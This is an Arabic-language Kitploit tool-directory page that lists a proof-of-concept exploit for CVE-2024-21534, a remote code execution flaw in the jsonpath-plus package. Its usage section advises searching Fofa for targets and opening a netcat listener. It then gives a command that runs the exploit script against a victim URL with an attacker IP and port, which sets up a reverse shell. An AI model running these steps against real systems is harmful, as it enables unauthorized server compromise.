Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2024-21534 — POC - CVE-2024-21534 Jsonpath-plus عرضة لتنفيذ التعليمات البرمجية عن بُعد (RCE) بسبب عدم تطهير المدخلات بشكل صحيح | Kitploit
أدوات/GitHubGitHub/verylazytech/cve-2024-21534
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليمأداة الوصول عن بعد
GitHubverylazytech/cve-2024-21534

cve-2024-21534

POC - CVE-2024-21534 Jsonpath-plus عرضة لتنفيذ التعليمات البرمجية عن بُعد (RCE) بسبب عدم تطهير المدخلات بشكل صحيح

عرض المستودع
51منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

POC - CVE-2024-21534 Jsonpath-plus عرضة لتنفيذ التعليمات البرمجية عن بُعد (RCE) بسبب عدم كفاية تنظيف المدخلات

My Shop Medium Github Buy Me A Coffee

نظرة عامة

تُعد CVE-2024-21534 ثغرة أمنية حرجة وُجدت في إصدارات حزمة jsonpath-plus قبل الإصدار 10.0.0. تنبع الثغرة من عدم كفاية تنظيف المدخلات، مما قد يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE) على الأنظمة المتأثرة. هذه الثغرة خطيرة بشكل خاص لأنه يمكن استغلالها دون مصادقة، مما يسمح للمهاجمين بتنفيذ تعليمات برمجية عشوائية على الخادم عن طريق إرسال مدخلات مصممة خصيصًا. تنشأ هذه المشكلة من الاستخدام الافتراضي غير الآمن لوحدة vm في Node.js، والتي قد تؤدي إذا تم استغلالها إلى اختراق النظام بأكمله.

الإصدارات المتأثرة

إصدارات jsonpath-plus قبل 10.2.0

المكونات المتأثرة

تقع الثغرة في حزمة jsonpath-plus، والتي تُستخدم على نطاق واسع للاستعلام عن هياكل بيانات JSON في التطبيقات. يرجع الخلل إلى عدم كفاية تنظيف المدخلات، مما يسمح بتنفيذ تعليمات برمجية خبيثة.

اقرأ عنها — CVE-2024-21534

إخلاء مسؤولية: تم إنشاء هذا الدليل (إثبات المفهوم POC) لأغراض تعليمية واختبار أخلاقي فقط. استخدام هذه الأداة لمهاجمة أهداف دون موافقة متبادلة مسبقة يعد غير قانوني. وتقع على عاتق المستخدم النهائي مسؤولية الامتثال لجميع القوانين المحلية والولائية والفيدرالية المعمول بها. لا يتحمل المطورون أي مسؤولية ولا يكونون مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.

البدء

إيجاد الأهداف

للعثور على أهداف محتملة، استخدم Fofa (مشابه لـ Shodan.io):

  • استعلام Fofa: Jsonpath-plus

Fofa

استنساخ المستودع

أولاً، قم باستنساخ المستودع:

root@kitploit:~
git clone https://github.com/verylazytech/CVE-2024-21534

الآن افتح مستمعًا باستخدام nc:

root@kitploit:~
nc -lnvp 443

شغّل الاستغلال:

لأنظمة Linux / MacOS:

تأكد من أن عنوان URL يشير إلى نقطة نهاية تعالج مدخلات المستخدم عبر حزمة jsonpath-plus المعرضة للثغرة، حيث سيسمح ذلك باستغلال ثغرة RCE.

root@kitploit:~
bash ./cve-2024-21534.sh <VICTIM_URL> <ATTACKER_IP> <ATTACKER_PORT>

secoand

سرد بعض المجلدات:

last

تنزيل الأداة